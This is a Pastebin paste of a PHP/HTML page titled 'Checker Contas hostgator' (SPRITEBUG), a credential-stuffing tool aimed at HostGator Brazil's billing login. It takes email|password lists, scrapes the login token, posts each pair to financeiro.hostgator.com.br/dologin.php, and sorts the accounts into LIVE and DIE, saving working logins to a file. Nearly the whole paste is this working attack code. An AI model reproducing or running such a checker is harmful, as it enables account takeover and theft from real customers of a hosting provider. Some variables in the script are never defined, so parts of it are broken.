Advertisement
Guest User

Hostgator L34NDR0

a guest
May 3rd, 2016
1,119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.35 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <meta charset="UTF-8">
  5. <title>SPRITEBUG | HOSTGATOR </title>
  6. <link rel="icon" type="image/png" href="http://i.imgur.com/3wSAHDu.png" />
  7. <link rel="stylesheet" type="text/css" media="all" href="plugins/animate.css">
  8. <meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no' name='viewport'>
  9. <link href="bootstrap/css/bootstrap.min.css" rel="stylesheet" type="text/css" />
  10. <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet" type="text/css" />
  11. <link href="http://code.ionicframework.com/ionicons/2.0.0/css/ionicons.min.css" rel="stylesheet" type="text/css" />
  12. <link href="plugins/morris/morris.css" rel="stylesheet" type="text/css" />
  13. <link href="plugins/jvectormap/jquery-jvectormap-1.2.2.css" rel="stylesheet" type="text/css" />
  14. <link href="plugins/daterangepicker/daterangepicker-bs3.css" rel="stylesheet" type="text/css" />
  15. <link href="dist/css/AdminLTE.min.css" rel="stylesheet" type="text/css" />
  16. <link href="dist/css/skins/_all-skins.min.css" rel="stylesheet" type="text/css" />
  17. <script type="text/javascript">
  18.  
  19. function catapau(){
  20. var count = parseInt($('#valor1').html());
  21. count++;
  22. $('#valor1').html(count+'');
  23. }
  24.  
  25. </script>
  26.  
  27.  
  28. </head>
  29. <body class="skin-blue">
  30. <div class="wrapper"><!-- Content Wrapper. Contains page content -->
  31. <!-- ./wrapper -->
  32. <script src="plugins/jQuery/jQuery-2.1.3.min.js"></script>
  33. <script src="bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
  34. <script src='plugins/fastclick/fastclick.min.js'></script>
  35. <script src="dist/js/app.min.js" type="text/javascript"></script>
  36. <script src="plugins/sparkline/jquery.sparkline.min.js" type="text/javascript"></script>
  37. <script src="plugins/jvectormap/jquery-jvectormap-1.2.2.min.js" type="text/javascript"></script>
  38. <script src="plugins/jvectormap/jquery-jvectormap-world-mill-en.js" type="text/javascript"></script>
  39. <script src="plugins/daterangepicker/daterangepicker.js" type="text/javascript"></script>
  40. <script src="plugins/datepicker/bootstrap-datepicker.js" type="text/javascript"></script>
  41. <script src="plugins/iCheck/icheck.min.js" type="text/javascript"></script>
  42. <script src="plugins/slimScroll/jquery.slimscroll.min.js" type="text/javascript"></script>
  43. <script src="plugins/chartjs/Chart.min.js" type="text/javascript"></script>
  44. <script src="dist/js/pages/dashboard2.js" type="text/javascript"></script>
  45. <script src="dist/js/demo.js" type="text/javascript"></script>
  46. <div class="content-wrapper">
  47. <!-- Content Header (Page header) -->
  48. <!-- Main content -->
  49. <section class="content">
  50. <!-- Info boxes -->
  51. <div class="zoomIn animated">
  52. <!-- Main content -->
  53. <div class="row">
  54. <div class="col-xs-11" style="margin: 0px auto;float:none;"><div class="box"><div class="box-title"><h3>&nbsp;<i class="fa fa-group"></i>&nbsp;&nbsp;Checker Contas hostgator</h3>
  55. </div>
  56. <?php
  57. $sock = '';
  58. error_reporting(0);
  59. function getStr($string,$start,$end){
  60. $str = explode($start,$string);
  61. $str = explode($end,$str[1]);
  62. return $str[0];
  63. }
  64. class cURL {
  65. var $callback = false;
  66. function setCallback($func_name) {
  67. $this->callback = $func_name;
  68. }
  69. function doRequest($method, $url) {
  70. $ch = curl_init();
  71. global $email, $pwd , $token;
  72. curl_setopt($ch, CURLOPT_URL, $url);
  73. curl_setopt($ch, CURLOPT_HEADER, 1);
  74. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); // RADOM DOS NAVEGADORES
  75. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  76. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  77.  
  78. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  79. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  80. curl_setopt($ch, CURLOPT_COOKIESESSION, true );
  81. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/hostgator.txt'); //COOKIES DO NAVEGADOR
  82. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/hostgator.txt'); //COOKIES DO NAVEGADOR
  83. curl_setopt($ch, CURLOPT_REFERER, 'http://www.saraiva.com.br/'); //REFERER DA SEGUNDA CHAMADO
  84. curl_setopt($ch, CURLOPT_VERBOSE, 1);
  85. if ($method == 'POST') {
  86. curl_setopt($ch, CURLOPT_POST, 1);
  87. curl_setopt($ch, CURLOPT_POSTFIELDS, 'token='.$token.'&username='.$email.'&password='.$pwd.''); //POST DO LIVE REQUESST
  88. }
  89. $data = curl_exec($ch); //AQUI PRA VER AS PAGINAS DE RESULTADO
  90. curl_close($ch);
  91. if ($data) {
  92. if ($this->callback) {
  93. $callback = $this->callback;
  94. $this->callback = false;
  95. return call_user_func($callback, $data);
  96. } else {
  97. return $data;
  98. }
  99. } else {
  100. return curl_error($ch);
  101. }
  102. }
  103. function get($url) {
  104. return $this->doRequest('GET', $url, 'NULL');
  105. }
  106. function post($url) {
  107. return $this->doRequest('POST', $url);
  108. }
  109. }
  110.  
  111. echo '
  112. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  113. <head></head>
  114. <style>
  115. </style>
  116. <script type="text/javascript">
  117. function pushPaypalDie(str){
  118. document.getElementById(\'listPaypalDie\').innerHTML += \'<div>\' + str + \'</div>\';
  119. }
  120. function pushPaypal(str){
  121. document.getElementById(\'listPaypal\').innerHTML += \'<div>\' + str + \'</div>\';
  122. }
  123. function pushWrongFormat(str){
  124. document.getElementById(\'listWrongFormat\').innerHTML += \'<div>\' + str + \'</div>\';
  125. }
  126. </script>
  127. </head>
  128. <body>
  129. <div class="main-content">
  130. <form method="post">
  131. <div align="center"><textarea name="mp" rows="10" class="form-control" placeholder="example@priv8.zapata|123456" style="width:90%">';
  132. if (isset($_POST['btn-submit']))
  133. echo $_POST['mp'];
  134. else
  135. echo 'EMAIL|SENHA';
  136. ;
  137. echo '</textarea><br />
  138. SEPARADOR: <input type="text" style="width:20px; text-align: center;" name="delim" value="';
  139.  
  140. if (isset($_POST['btn-submit']))
  141. echo $_POST['delim'];
  142. else
  143. echo '|';
  144. ;
  145. echo '" size="1" /><input type="hidden" name="mail" value="';
  146. if (isset($_POST['btn-submit']))
  147. echo $_POST['mail'];
  148. else
  149. echo 0;
  150. ;
  151. echo '" size="1" /><input type="hidden" name="pwd" value="';
  152. if (isset($_POST['btn-submit']))
  153. echo $_POST['pwd'];
  154. else
  155. echo 1;
  156. ;
  157. echo '" size="1" />&nbsp;
  158.  
  159. <input type="submit" class="btn btn-info" value="CHECAR" name="btn-submit" /> </br>&nbsp;&nbsp;&nbsp;&nbsp;
  160. </div>
  161. </div>
  162. </form>
  163. ';
  164. set_time_limit(0);
  165. include("use.php");
  166. function fetch_value($str, $find_start, $find_end) {
  167. $start = strpos($str, $find_start);
  168. if ($start === false) {
  169. return "";
  170. }
  171. $length = strlen($find_start);
  172. $end = strpos(substr($str, $start + $length), $find_end);
  173. return trim(substr($str, $start + $length, $end));
  174. }
  175. function fetch_value_notrim($str, $find_start, $find_end) {
  176. $start = strpos($str, $find_start);
  177. if ($start === false) {
  178. return "";
  179. }
  180. $length = strlen($find_start);
  181. $end = strpos(substr($str, $start + $length), $find_end);
  182. return substr($str, $start + $length, $end);
  183. }
  184. $dir = dirname(__FILE__);
  185. $config['cookie_file'] = $dir . '/cookies/' . md5($_SERVER['REMOTE_ADDR']) . '.txt';
  186. if (!file_exists($config['cookie_file'])) {
  187. $fp = @fopen($config['cookie_file'], 'w');
  188. @fclose($fp);
  189. }
  190. $zzz = "";
  191. $live = array();
  192. function get($list) {
  193. preg_match_all("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}/", $list, $socks);
  194. return $socks[0];
  195. }
  196. function delete_cookies() {
  197. global $config;
  198. $fp = @fopen($config['cookie_file'], 'w');
  199. @fclose($fp);
  200. }
  201. function xflush() {
  202. static $output_handler = null;
  203. if ($output_handler === null) {
  204. $output_handler = @ini_get('output_handler');
  205. }
  206.  
  207. if ($output_handler == 'ob_gzhandler') {
  208. return;
  209. }
  210.  
  211. flush();
  212. if (function_exists('ob_flush') AND function_exists('ob_get_length') AND ob_get_length() !== false) {
  213. @ob_flush();
  214. } else if (function_exists('ob_end_flush') AND function_exists('ob_start') AND function_exists('ob_get_length') AND ob_get_length() !== FALSE) {
  215. @ob_end_flush();
  216. @ob_start();
  217. }
  218. }
  219. function curl_grab_page($site,$proxy,$proxystatus){
  220. $chss = curl_init();
  221. curl_setopt($chss, CURLOPT_RETURNTRANSFER, TRUE);
  222. if ($proxystatus == 'on') {
  223. curl_setopt($chss, CURLOPT_SSL_VERIFYHOST, FALSE);
  224. curl_setopt($chss, CURLOPT_HTTPPROXYTUNNEL, TRUE);
  225. curl_setopt($chss, CURLOPT_PROXY, $proxy);
  226. }
  227. curl_setopt($chss, CURLOPT_COOKIEFILE, "cookie.txt");
  228. curl_setopt($chss, CURLOPT_URL, $site);
  229. return curl_exec($chss);
  230. curl_close ($chss);
  231.  
  232. }
  233. function display($str) {
  234. echo '<div>' . $str . '</div>';
  235. xflush();
  236. }
  237. //function pushSockDie($str) {
  238. // echo '<script type="text/javascript">pushSockDie(\'' . $str . '\');</script>';
  239. // xflush();
  240. //}
  241. function pushPaypalDie($str) {
  242. echo '<script type="text/javascript">pushPaypalDie(\'' . $str . '\');</script>';
  243. file_put_contents('api/accountsdead.txt', $str . PHP_EOL, FILE_APPEND);
  244. xflush();
  245. }
  246. function pushPaypal($str) {
  247. echo '<script type="text/javascript">pushPaypal(\'' . $str . '\');</script>';
  248. file_put_contents('api/accounts.txt', $str . PHP_EOL, FILE_APPEND);
  249. xflush();
  250. }
  251. function pushWrongFormat($str) {
  252. echo '<script type="text/javascript">pushWrongFormat(\'' . $str . '\');</script>';
  253. xflush();
  254. }
  255.  
  256. if (isset($_POST['btn-submit'])) {
  257.  
  258.  
  259.  
  260. ;
  261. echo '<br/>
  262. <br/>
  263.  
  264. <div class="bounceIn animated">
  265. <div class="box box-success">
  266. <div class="box-header">
  267. <h3 class="box-title"><i class="fa fa-list"></i>&nbsp;&nbsp;&nbsp;<strong>LIVE</strong></h3>
  268. </div>
  269. <div class="box-body">
  270. <div class="box-body" id="listPaypal" ></div>
  271. </div><!-- /.box-body -->
  272. </div>
  273.  
  274. <div class="box box-danger">
  275. <div class="box-header">
  276. <h3 class="box-title"><i class="fa fa-list"></i>&nbsp;&nbsp;&nbsp;<strong>DIE</strong> </h3>
  277. </div>
  278. <div class="box-body">
  279. <div class="box-body" id="listPaypalDie" ></div>
  280. </div><!-- /.box-body -->
  281. </div>
  282.  
  283. <div class="box box-warning">
  284. <div class="box-header">
  285. <h3 class="box-title"><i class="fa fa-list"></i>&nbsp;&nbsp;&nbsp;<strong>Unknow</strong>/<strong>Format</strong></h3>
  286. </div>
  287. <div class="box-body">
  288. <div class="box-body" id="listWrongFormat"></div>
  289. </div><!-- /.box-body -->
  290. </div>
  291. </div>
  292.  
  293. <br/>
  294.  
  295. <br/>
  296.  
  297.  
  298. ';
  299. xflush();
  300. $emails = explode("\n", trim($_POST['mp']));
  301. $eCount = count($emails);
  302. $failed = $live = $uncheck = array();
  303. $checked = 0;
  304. if (!count($emails)) {
  305. continue;
  306. }
  307. delete_cookies();
  308. //$sockClear = isSockClear();
  309. //if ($sockClear != 1) {
  310. //pushSockDie('[<font color="#FF0000">' . $sock . '</font>]');
  311. //continue;
  312. //}
  313.  
  314.  
  315.  
  316.  
  317. foreach ($emails AS $k => $line) {
  318. $info = explode($_POST['delim'], $line);
  319. $email = trim($info["{$_POST['mail']}"]);
  320. $pwd = trim($info["{$_POST['pwd']}"]);
  321. if (stripos($email, '@') === false || strlen($pwd) < 2) {
  322. unset($emails[$k]);
  323. pushWrongFormat($email . ' | ' . $pwd);
  324. continue;
  325. }
  326. //if ($failed[$sock] > 4)
  327. // continue;
  328.  
  329.  
  330. //DELETAR COOKIES
  331. if(file_exists(getcwd().'/hostgator.txt')) {
  332. unlink(getcwd().'/hostgator.txt');
  333. }
  334.  
  335.  
  336. $a = new cURL();
  337. $b = $a->get("https://financeiro.hostgator.com.br/");//CHAMADA TOKEN
  338. $token = getStr($b,'name="token" value="','"'); //CHAMADA TOKEN
  339. $c = new cURL();
  340. $d = $c->post("https://financeiro.hostgator.com.br/dologin.php"); //POST DA 2 CHAMADA
  341.  
  342.  
  343. if($d){
  344.  
  345.  
  346. if (stristr($d,'Sair') !== false) {
  347. /*MEIO*/
  348.  
  349. /* $aq = mysql_query("UPDATE `usuarios` SET `creditos`='$creditos' WHERE login_usuario='$login_usuario'");*/
  350.  
  351. /*FIM MEIO*/
  352. $xyz = "<b style=\"color:SteelBlue\">[</b><b style=\"color:DodgerBlue\">SPRITEBUG</b><b style=\"color:SteelBlue\">]</b><b style=\"color:green\">LIVE</b> | <b style=\"color:black\" >$email</b> | <b style=\"color:black\">$pwd<b/> | <b style=\"color:Blue\"> [CRE:$creditos]<b/> ";
  353. /*CONTA*/
  354. $live[] = $xyz;
  355. unset($emails[$k]);
  356. pushPaypal($xyz);
  357.  
  358. } else {
  359. pushPaypalDie("<b style=\"color:red\">DIE</b> => $sock | <b style=\"color:Gray11\" >$email<b> | $pwd ");
  360. unset($emails[$k]);
  361. }
  362. } elseif($dias >= 1) {
  363. if (stristr($d,'Sair') !== false) {
  364. $xyz = "<b style=\"color:SteelBlue\">[</b><b style=\"color:DodgerBlue\">SPRITEBUG</b><b style=\"color:SteelBlue\">]</b><b style=\"color:green\">LIVE</b> | <b style=\"color:black\" >$email</b> | <b style=\"color:black\">$pwd<b/> | <b style=\"color:Blue\"> [DIA:$dias]<b/> ";
  365. $live[] = $xyz;
  366. unset($emails[$k]);
  367. pushPaypal($xyz);
  368.  
  369. } else {
  370. pushPaypalDie("<b style=\"color:red\">DIE</b> => $sock | <b style=\"color:Gray11\" >$email<b> | $pwd ");
  371. unset($emails[$k]);
  372. }
  373. } else {
  374. echo "<script>alert('Você Não tem mais creditos :/ Minimo são 5 Creditos ')</script>";
  375. }
  376. }
  377.  
  378.  
  379.  
  380.  
  381.  
  382.  
  383.  
  384.  
  385.  
  386.  
  387.  
  388.  
  389.  
  390.  
  391.  
  392.  
  393.  
  394. }
  395. if (count($emails)) {
  396. display("Sem Testar:");
  397. display('<textarea cols="80" rows="10">' . implode("\n", $emails) . '</textarea>');
  398. }
  399.  
  400. echo '</body>
  401. </html>';
  402. ?>
  403. </div>
  404. </div>
  405. </div>
  406. <!-- /.row --><!-- /.content -->
  407. </div>
  408. <!-- /.content-wrapper -->
  409. <div id="alert" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  410. <div class="modal-header">
  411. <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&#215;</button>
  412. <h3 id="myModalLabel">Alert Message</h3>
  413. </div>
  414. <div class="modal-body">
  415. <p>Checking done!</p>
  416. </div>
  417. <div class="modal-footer">
  418. <button class="button button-basic-blue" data-dismiss="modal"></button>
  419. </div>
  420. </div>
  421. </div>
  422. <script type="text/javascript">
  423. <!--
  424. var count = $('#cc').children().length;
  425. $('#quantiacc').html(count);
  426. var count = parseInt($('#quantiaccapos').html());
  427. count++;
  428. $('#quantiaccapos').html(count+'');
  429. $('#stop').attr("disabled", true);
  430. $("#loading").css("display", "none");
  431. $("#result").css("display", "none");
  432. $("#submit").on("click", function(){
  433. var texto = $.trim($('#logins').val());
  434. if ( texto.length > 20 ) {
  435. $("#result").css("display", "inline");
  436. $("#loading").css("display", "inline");
  437. $('#stop').attr("disabled", false);
  438. $('#submit').attr("disabled", "disabled");
  439. } else {
  440. alert("Não Há CCs ou invalido!!");
  441. $("#loading").css("display", "none");
  442. $('#stop').attr("disabled", true);
  443. $('#submit').attr("disabled", false);
  444. return false;
  445. }
  446. });
  447. $( "#stop" ).click(function() {
  448. $("#loading").css("display", "none");
  449. $('#stop').attr("disabled", true);
  450. $('#submit').attr("disabled", false);
  451. });
  452. //-->
  453. </script>
  454. </body>
  455. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement